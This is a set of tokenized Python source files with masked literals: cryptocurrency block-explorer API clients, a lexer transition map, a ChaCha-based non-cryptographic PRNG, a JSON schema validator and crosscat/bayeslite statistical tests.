"<STR_LIT>" <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , <EOL> by , block_hash or block_number <EOL> ) <EOL> b = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = int ( b [ '<STR_LIT>' ] ) , <EOL> time = arrow . get ( b [ '<STR_LIT:time>' ] ) . datetime , <EOL> hash = b [ '<STR_LIT>' ] , <EOL> previous_hash = b [ '<STR_LIT>' ] , <EOL> txids = [ x [ '<STR_LIT>' ] for x in b [ '<STR_LIT>' ] ] , <EOL> tx_count = int ( b [ '<STR_LIT>' ] ) , <EOL> size = int ( b [ '<STR_LIT:size>' ] ) , <EOL> sent_value = float ( b [ '<STR_LIT>' ] ) + float ( b [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = float ( b [ '<STR_LIT>' ] ) , <EOL> merkle_root = b [ '<STR_LIT>' ] , <EOL> total_fees = float ( b [ '<STR_LIT>' ] ) <EOL> ) <EOL> class BlockExplorersNet ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_coin ( cls , crypto ) : <EOL> if crypto == '<STR_LIT>' : <EOL> return "<STR_LIT>" <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , address <EOL> ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> url = "<STR_LIT>" % ( domain , address ) <EOL> return self . get_url ( url ) . json ( ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> url = "<STR_LIT>" % ( domain , txid ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> if not d [ '<STR_LIT>' ] or not d [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) : <EOL> ins = [ { '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> else : <EOL> ins = [ { '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> outs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT:time>' ] ) . datetime , <EOL> block_hash = d [ '<STR_LIT>' ] , <EOL> hex = d [ '<STR_LIT>' ] , <EOL> inputs = ins , <EOL> outputs = outs , <EOL> txid = txid , <EOL> total_out = sum ( x [ '<STR_LIT:value>' ] for x in outs ) , <EOL> confirmations = d [ '<STR_LIT>' ] , <EOL> ) <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> if latest : <EOL> url = "<STR_LIT>" % domain <EOL> block_number = int ( self . get_url ( url ) . content ) <EOL> if block_number : <EOL> url = "<STR_LIT>" % ( domain , block_number ) <EOL> block_hash = self . get_url ( url ) . content <EOL> url = "<STR_LIT>" % ( domain , block_hash ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> txs = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> difficulty = r [ '<STR_LIT>' ] , <EOL> ) <EOL> class UNOCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> protocol = '<STR_LIT:http>' <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class RICCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> protocol = '<STR_LIT:http>' <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ProHashing ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , ] <EOL> def get_address_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , address , self . _get_coin ( crypto ) <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if r . get ( '<STR_LIT:message>' , None ) : <EOL> raise SkipThisService ( "<STR_LIT>" % r [ '<STR_LIT:message>' ] ) <EOL> return r [ '<STR_LIT>' ] <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> params = "<STR_LIT>" <EOL> url = "<STR_LIT>" % ( <EOL> params , address , self . _get_coin ( crypto ) <EOL> ) <EOL> return self . get_url ( url ) . json ( ) <EOL> def _get_coin ( self , crypto ) : <EOL> from crypto_data import crypto_data <EOL> full_name = crypto_data [ crypto ] [ '<STR_LIT:name>' ] <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , full_name <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if r . get ( '<STR_LIT:message>' , None ) : <EOL> raise SkipThisService ( "<STR_LIT>" % r [ '<STR_LIT:message>' ] ) <EOL> return r [ '<STR_LIT:id>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest or block_hash : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , self . _get_coin ( crypto ) , <EOL> ) <EOL> if block_hash : <EOL> url = "<STR_LIT>" % ( <EOL> url , block_hash <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> txs = [ x [ '<STR_LIT>' ] for x in r [ '<STR_LIT>' ] ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> difficulty = r [ '<STR_LIT>' ] , <EOL> ) </s>
<s> from copy import copy <EOL> import string <EOL> from sys import maxint <EOL> from types import TupleType <EOL> class TransitionMap : <EOL> """<STR_LIT>""" <EOL> map = None <EOL> special = None <EOL> def __init__ ( self , map = None , special = None ) : <EOL> if not map : <EOL> map = [ - maxint , { } , maxint ] <EOL> if not special : <EOL> special = { } <EOL> self . map = map <EOL> self . special = special <EOL> def add ( self , event , new_state , <EOL> TupleType = TupleType ) : <EOL> """<STR_LIT>""" <EOL> if type ( event ) == TupleType : <EOL> code0 , code1 = event <EOL> i = self . split ( code0 ) <EOL> j = self . split ( code1 ) <EOL> map = self . map <EOL> while i < j : <EOL> map [ i + <NUM_LIT:1> ] [ new_state ] = <NUM_LIT:1> <EOL> i = i + <NUM_LIT:2> <EOL> else : <EOL> self . get_special ( event ) [ new_state ] = <NUM_LIT:1> <EOL> def add_set ( self , event , new_set , <EOL> TupleType = TupleType ) : <EOL> """<STR_LIT>""" <EOL> if type ( event ) == TupleType : <EOL> code0 , code1 = event <EOL> i = self . split ( code0 ) <EOL> j = self . split ( code1 ) <EOL> map = self . map <EOL> while i < j : <EOL> map [ i + <NUM_LIT:1> ] . update ( new_set ) <EOL> i = i + <NUM_LIT:2> <EOL> else : <EOL> self . get_special ( event ) . update ( new_set ) <EOL> def get_epsilon ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . special . get ( '<STR_LIT>' ) <EOL> def items ( self , <EOL> len = len ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> map = self . map <EOL> else_set = map [ <NUM_LIT:1> ] <EOL> i = <NUM_LIT:0> <EOL> n = len ( map ) - <NUM_LIT:1> <EOL> code0 = map [ <NUM_LIT:0> ] <EOL> while i < n : <EOL> set = map [ i + <NUM_LIT:1> ] <EOL> code1 = map [ i + <NUM_LIT:2> ] <EOL> if set or else_set : <EOL> result . append ( ( ( code0 , code1 ) , set ) ) <EOL> code0 = code1 <EOL> i = i + <NUM_LIT:2> <EOL> for event , set in self . special . items ( ) : <EOL> if set : <EOL> result . append ( ( event , set ) ) <EOL> return result <EOL> def split ( self , code , <EOL> len = len , maxint = maxint ) : <EOL> """<STR_LIT>""" <EOL> map = self . map <EOL> hi = len ( map ) - <NUM_LIT:1> <EOL> if code == maxint : <EOL> return hi <EOL> lo = <NUM_LIT:0> <EOL> while hi - lo >= <NUM_LIT:4> : <EOL> mid = ( ( lo + hi ) / <NUM_LIT:2> ) & ~ <NUM_LIT:1> <EOL> if code < map [ mid ] : <EOL> hi = mid <EOL> else : <EOL> lo = mid <EOL> if map [ lo ] == code : <EOL> return lo <EOL> else : <EOL> map [ hi : hi ] = [ code , map [ hi - <NUM_LIT:1> ] . copy ( ) ] <EOL> return hi <EOL> def get_special ( self , event ) : <EOL> """<STR_LIT>""" <EOL> special = self . special <EOL> set = special . get ( event , None ) <EOL> if not set : <EOL> set = { } <EOL> special [ event ] = set <EOL> return set <EOL> def __str__ ( self ) : <EOL> map_strs = [ ] <EOL> map = self . map <EOL> n = len ( map ) <EOL> i = <NUM_LIT:0> <EOL> while i < n : <EOL> code = map [ i ] <EOL> if code == - maxint : <EOL> code_str = "<STR_LIT>" <EOL> elif code == maxint : <EOL> code_str = "<STR_LIT>" <EOL> else : <EOL> code_str = str ( code ) <EOL> map_strs . append ( code_str ) <EOL> i = i + <NUM_LIT:1> <EOL> if i < n : <EOL> map_strs . append ( state_set_str ( map [ i ] ) ) <EOL> i = i + <NUM_LIT:1> <EOL> special_strs = { } <EOL> for event , set in self . special . items ( ) : <EOL> special_strs [ event ] = state_set_str ( set ) <EOL> return "<STR_LIT>" % ( <EOL> string . join ( map_strs , "<STR_LIT:U+002C>" ) , <EOL> special_strs <EOL> ) <EOL> def check ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . map [ - <NUM_LIT:3> ] < self . map [ - <NUM_LIT:1> ] : <EOL> print self <EOL> assert <NUM_LIT:0> <EOL> def dump ( self , file ) : <EOL> map = self . map <EOL> i = <NUM_LIT:0> <EOL> n = len ( map ) - <NUM_LIT:1> <EOL> while i < n : <EOL> self . dump_range ( map [ i ] , map [ i + <NUM_LIT:2> ] , map [ i + <NUM_LIT:1> ] , file ) <EOL> i = i + <NUM_LIT:2> <EOL> for event , set in self . special . items ( ) : <EOL> if set : <EOL> if not event : <EOL> event = '<STR_LIT>' <EOL> self . dump_trans ( event , set , file ) <EOL> def dump_range ( self , code0 , code1 , set , file ) : <EOL> if set : <EOL> if code0 == - maxint : <EOL> if code1 == maxint : <EOL> k = "<STR_LIT>" <EOL> else : <EOL> k = "<STR_LIT>" % self . dump_char ( code1 ) <EOL> elif code1 == maxint : <EOL> k = "<STR_LIT>" % self . dump_char ( code0 - <NUM_LIT:1> ) <EOL> elif code0 == code1 - <NUM_LIT:1> : <EOL> k = self . dump_char ( code0 ) <EOL> else : <EOL> k = "<STR_LIT>" % ( self . dump_char ( code0 ) , <EOL> self . dump_char ( code1 - <NUM_LIT:1> ) ) <EOL> self . dump_trans ( k , set , file ) <EOL> def dump_char ( self , code ) : <EOL> if <NUM_LIT:0> <= code <= <NUM_LIT:255> : <EOL> return repr ( chr ( code ) ) <EOL> else : <EOL> return "<STR_LIT>" % code <EOL> def dump_trans ( self , key , set , file ) : <EOL> file . write ( "<STR_LIT>" % ( key , self . dump_set ( set ) ) ) <EOL> def dump_set ( self , set ) : <EOL> return state_set_str ( set ) <EOL> def state_set_str ( set ) : <EOL> state_list = set . keys ( ) <EOL> str_list = [ ] <EOL> for state in state_list : <EOL> str_list . append ( "<STR_LIT>" % state . number ) <EOL> return "<STR_LIT>" % string . join ( str_list , "<STR_LIT:U+002C>" ) </s>
<s> import chacha <EOL> import os <EOL> import struct <EOL> import threading <EOL> class WeakPRNG ( object ) : <EOL> const32 = chacha . const32 <EOL> zero = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> def __init__ ( self , seed ) : <EOL> self . key = struct . unpack ( '<STR_LIT>' , seed ) <EOL> self . ctr = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> self . buf = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> def weakrandom32 ( self ) : <EOL> buf = self . buf <EOL> if buf [ <NUM_LIT:15> ] == <NUM_LIT:0> : <EOL> ctr = self . ctr <EOL> chacha . core ( <NUM_LIT:8> , buf , ctr , self . key , self . const32 ) <EOL> t = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> t = ctr [ i ] + t <EOL> ctr [ i ] = t & <NUM_LIT> <EOL> t >>= <NUM_LIT:32> <EOL> r = buf [ <NUM_LIT:15> ] <EOL> buf [ <NUM_LIT:15> ] = <NUM_LIT:15> <EOL> return r <EOL> buf [ <NUM_LIT:15> ] -= <NUM_LIT:1> <EOL> return buf [ buf [ <NUM_LIT:15> ] ] <EOL> def weakrandom64 ( self ) : <EOL> rh = self . weakrandom32 ( ) <EOL> rl = self . weakrandom32 ( ) <EOL> return ( rh << <NUM_LIT:32> ) | rl <EOL> def weakrandom_uniform ( self , n ) : <EOL> assert <NUM_LIT:0> < n <EOL> nbits = n . bit_length ( ) <EOL> nwords = ( nbits + <NUM_LIT> ) / <NUM_LIT:32> <EOL> l = ( ( <NUM_LIT:1> << nbits ) - n ) % n <EOL> while True : <EOL> r = <NUM_LIT:0> <EOL> for i in range ( nwords ) : <EOL> r <<= <NUM_LIT:32> <EOL> r |= self . weakrandom32 ( ) <EOL> if r < l : <EOL> continue <EOL> return ( r % n ) <EOL> def weakrandom_bytearray ( self , buf , start , end ) : <EOL> assert end <= len ( buf ) <EOL> assert start <= end <EOL> nbytes = end - start <EOL> if nbytes < <NUM_LIT> : <EOL> nwords = nbytes / <NUM_LIT:4> <EOL> for i in range ( nwords ) : <EOL> buf [ start + <NUM_LIT:4> * i : start + <NUM_LIT:4> * ( i + <NUM_LIT:1> ) ] = struct . pack ( '<STR_LIT>' , self . weakrandom32 ( ) ) <EOL> nextra = nbytes - <NUM_LIT:4> * nwords <EOL> if <NUM_LIT:0> < nextra : <EOL> buf [ start + <NUM_LIT:4> * nwords : start + <NUM_LIT:4> * nwords + nextra ] = struct . pack ( '<STR_LIT>' , self . weakrandom32 ( ) ) [ <NUM_LIT:0> : nextra ] <EOL> else : <EOL> subkey = [ self . weakrandom32 ( ) for i in range ( <NUM_LIT:8> ) ] <EOL> const32 = self . const32 <EOL> ctr = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> out = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> nblocks = nbytes / <NUM_LIT:64> <EOL> for i in range ( nblocks ) : <EOL> chacha . core ( <NUM_LIT:8> , out , ctr , subkey , const32 ) <EOL> t = ctr [ <NUM_LIT:0> ] + <NUM_LIT:1> ; ctr [ <NUM_LIT:0> ] = t & <NUM_LIT> ; ctr [ <NUM_LIT:1> ] += t <EOL> buf [ start + <NUM_LIT:64> * i : start + <NUM_LIT:64> * ( i + <NUM_LIT:1> ) ] = struct . pack ( '<STR_LIT>' , * out ) <EOL> nextra = nbytes - <NUM_LIT:64> * nblocks <EOL> if <NUM_LIT:0> < nextra : <EOL> chacha . core ( <NUM_LIT:8> , out , ctr , subkey , const32 ) <EOL> buf [ start + <NUM_LIT:64> * nblocks : start + <NUM_LIT:64> * nblocks + nextra ] = struct . pack ( '<STR_LIT>' , * out ) [ <NUM_LIT:0> : nextra ] <EOL> subkey [ <NUM_LIT:0> : <NUM_LIT:8> ] = out [ <NUM_LIT:0> : <NUM_LIT:8> ] = out [ <NUM_LIT:8> : <NUM_LIT:16> ] = self . zero <EOL> def weakrandom_bytes ( self , n ) : <EOL> buf = bytearray ( n ) <EOL> self . weakrandom_bytearray ( buf , <NUM_LIT:0> , n ) <EOL> return bytes ( buf ) <EOL> def weakprng ( seed ) : <EOL> return WeakPRNG ( seed ) <EOL> if weakprng ( bytes ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT:32> ) ) ) . weakrandom64 ( ) != <NUM_LIT> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> nondeterministic_weakprng_local = threading . local ( ) <EOL> nondeterministic_weakprng_local . prng = None <EOL> def nondeterministic_weakprng ( ) : <EOL> if nondeterministic_weakprng_local . prng == None : <EOL> nondeterministic_weakprng_local . prng = weakprng ( os . urandom ( <NUM_LIT:32> ) ) <EOL> return nondeterministic_weakprng_local . prng <EOL> def nondeterministic_weakrandom32 ( ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom32 ( ) <EOL> def nondeterministic_weakrandom64 ( ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom64 ( ) <EOL> def nondeterministic_weakrandom_uniform ( n ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom_uniform ( n ) <EOL> def nondeterministic_weakrandom_bytearray ( buf , start , end ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom_bytearray ( buf , start , end ) <EOL> def nondeterministic_weakrandom_bytes ( n ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom_bytes ( n ) <EOL> nondeterministic_weakrandom32 ( ) <EOL> nondeterministic_weakrandom64 ( ) <EOL> nondeterministic_weakrandom_uniform ( <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT:16> ) , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytes ( <NUM_LIT> ) </s>
<s> import json <EOL> import jsonschema <EOL> import pkgutil <EOL> class Validator ( object ) : <EOL> def __init__ ( self ) : <EOL> schema_json = pkgutil . get_data ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . schema = json . loads ( schema_json ) <EOL> def validate ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> jsonschema . validate ( obj , self . schema ) </s>
<s> import os <EOL> import pytest <EOL> import bayeslite <EOL> from bayeslite . metamodels . crosscat import CrosscatMetamodel <EOL> import bayeslite . read_csv as read_csv <EOL> import crosscat . LocalEngine <EOL> root = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> dha_csv = os . path . join ( root , '<STR_LIT>' ) <EOL> dha_models = os . path . join ( root , '<STR_LIT>' ) <EOL> dha_codebook = os . path . join ( root , '<STR_LIT>' ) <EOL> def test_legacy_models__ci_slow ( ) : <EOL> bdb = bayeslite . bayesdb_open ( builtin_metamodels = False ) <EOL> cc = crosscat . LocalEngine . LocalEngine ( seed = <NUM_LIT:0> ) <EOL> metamodel = CrosscatMetamodel ( cc ) <EOL> bayeslite . bayesdb_register_metamodel ( bdb , metamodel ) <EOL> with pytest . raises ( ValueError ) : <EOL> bayeslite . bayesdb_load_legacy_models ( bdb , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dha_models , create = True ) <EOL> with open ( dha_csv , '<STR_LIT>' ) as f : <EOL> read_csv . bayesdb_read_csv ( bdb , '<STR_LIT>' , f , header = True , create = True ) <EOL> bayeslite . bayesdb_load_legacy_models ( bdb , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dha_models , create = True ) <EOL> bdb . execute ( '<STR_LIT>' ) <EOL> bayeslite . bayesdb_load_codebook_csv_file ( bdb , '<STR_LIT>' , dha_codebook ) <EOL> bayeslite . bayesdb_load_codebook_csv_file ( bdb , '<STR_LIT>' , dha_codebook ) <EOL> bql = '''<STR_LIT>''' <EOL> with bdb . savepoint ( ) : <EOL> assert bdb . execute ( bql , ( '<STR_LIT>' , ) ) . fetchall ( ) == [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ] <EOL> bql = '''<STR_LIT>''' <EOL> with bdb . savepoint ( ) : <EOL> assert bdb . execute ( bql ) . fetchall ( ) == [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ] </s>
<s> from __future__ import print_function <EOL> import numpy <EOL> import crosscat . cython_code . ContinuousComponentModel as CCM <EOL> import crosscat . cython_code . MultinomialComponentModel as MCM <EOL> import crosscat . cython_code . State as State <EOL> c_hypers = dict ( r = <NUM_LIT:10> , nu = <NUM_LIT:10> , s = <NUM_LIT:10> , mu = <NUM_LIT:10> ) <EOL> ccm = CCM . p_ContinuousComponentModel ( c_hypers ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( ccm ) <EOL> for element in [ numpy . nan , <NUM_LIT:0> , <NUM_LIT:1> , numpy . nan , <NUM_LIT:2> ] : <EOL> print ( ) <EOL> ccm . insert_element ( element ) <EOL> print ( "<STR_LIT>" % element ) <EOL> print ( ccm ) <EOL> m_hypers = dict ( dirichlet_alpha = <NUM_LIT:10> , K = <NUM_LIT:3> ) <EOL> mcm = MCM . p_MultinomialComponentModel ( m_hypers ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( mcm ) <EOL> for element in [ numpy . nan , <NUM_LIT:0> , <NUM_LIT:1> , numpy . nan , <NUM_LIT:2> ] : <EOL> print ( ) <EOL> mcm . insert_element ( element ) <EOL> print ( "<STR_LIT>" % element ) <EOL> print ( mcm ) </s>
<s> import pytest <EOL> import crosscat . tests . synthetic_data_generator as sdg <EOL> from crosscat . LocalEngine import LocalEngine <EOL> '''<STR_LIT>''' <EOL> N_ROWS = <NUM_LIT:1000> <EOL> def quick_le ( seed , n_chains = <NUM_LIT:1> ) : <EOL> cctypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> distargs = [ None , None , dict ( K = <NUM_LIT:9> ) , dict ( K = <NUM_LIT:7> ) , None ] <EOL> cols_to_views = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> separation = [ <NUM_LIT> , <NUM_LIT> ] <EOL> cluster_weights = [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] <EOL> T , M_c , M_r = sdg . gen_data ( cctypes , N_ROWS , cols_to_views , cluster_weights , <EOL> separation , seed = seed , distargs = distargs , return_structure = True ) <EOL> engine = LocalEngine ( ) <EOL> X_L , X_D = engine . initialize ( M_c , M_r , T , seed , n_chains = n_chains ) <EOL> return T , M_r , M_c , X_L , X_D , engine <EOL> def test_simple_predictive_probability_observed ( ) : <EOL> pass <EOL> def test_simple_predictive_probability_unobserved ( seed = <NUM_LIT:0> ) : <EOL> T , M_r , M_c , X_L , X_D , engine = quick_le ( seed ) <EOL> Q = [ [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] , [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] <EOL> val = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> with pytest . raises ( AssertionError ) : <EOL> assert val [ <NUM_LIT:0> ] == <NUM_LIT:0> <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> val = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> with pytest . raises ( AssertionError ) : <EOL> assert val [ <NUM_LIT:0> ] == <NUM_LIT:0> <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:4> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) ] <EOL> with pytest . raises ( IndexError ) : <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:4> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ) ] <EOL> with pytest . raises ( IndexError ) : <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> def test_predictive_probability_observed ( seed = <NUM_LIT:0> ) : <EOL> pass <EOL> def test_predictive_probability_unobserved ( seed = <NUM_LIT:0> ) : <EOL> T , M_r , M_c , X_L , X_D , engine = quick_le ( seed ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:10> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> vals = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS - <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> vals = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) ] 